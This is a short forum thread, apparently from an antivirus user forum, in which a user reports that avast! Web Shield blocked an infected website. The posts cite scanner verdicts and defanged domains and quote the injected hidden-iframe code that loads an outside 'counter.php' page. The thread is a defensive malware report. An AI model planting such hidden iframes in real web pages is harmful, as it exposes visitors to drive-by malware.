Author Topic: avast! Webshield good detection! (Read 1833 times)

polonus · « **on:** April 09, 2013, 04:55:09 PM »

To-day blocked malware from this site:    wXw.jolalipka.com
status:    Site infected with malware avast! Web Shield detects as HTML:Iframe-ZG[Trj]
web trust:     Not Blacklisted
Malware: http://labs.sucuri.net/db/malware/malware-entry-mwiframeenc1560
Quttera detects: -/uk/index.html
Severity: Suspicious
Reason: Detected hidden reference to external web resource.
Details: Detected hidden iframe tag to 'ingilizceturkcesozluk dot com'

Code: [Select]

   [[[<iframe src="htxp://ingilizceturkcesozluk.com/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>]]/code]
Offset: 8826 

Flagged here: http://www.google.com/safebrowsing/diagnostic?site=jolalipka.com
Suspicious external link: hxtp://wbuduarze.pl/index.html 

polonus

polonus · « **Reply #1 on:** April 09, 2013, 05:03:37 PM »

Also suspicious: http://zulu.zscaler.com/submission/show/15dab78a601c1265530fc9a7a3fee4ce-1365519279
Suspicious external iFrame found, see: http://evuln.com/tools/malware-scanner/wbuduarze.pl/
to htxp://www.gonulsayfasifm.com/counter.php -> Unable to properly scan your site. Unable to connect.
site with 4 trojans: http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=www.gonulsayfasifm.com
I get a 11004 [11004] Valid name, no data record (check DNS setup) (but could be site is being blocked on my machine through a particular blocking list)

polonus

Author Topic: avast! Webshield good detection! (Read 1833 times)

polonus

avast! Webshield good detection!

polonus

Re: avast! Webshield good detection!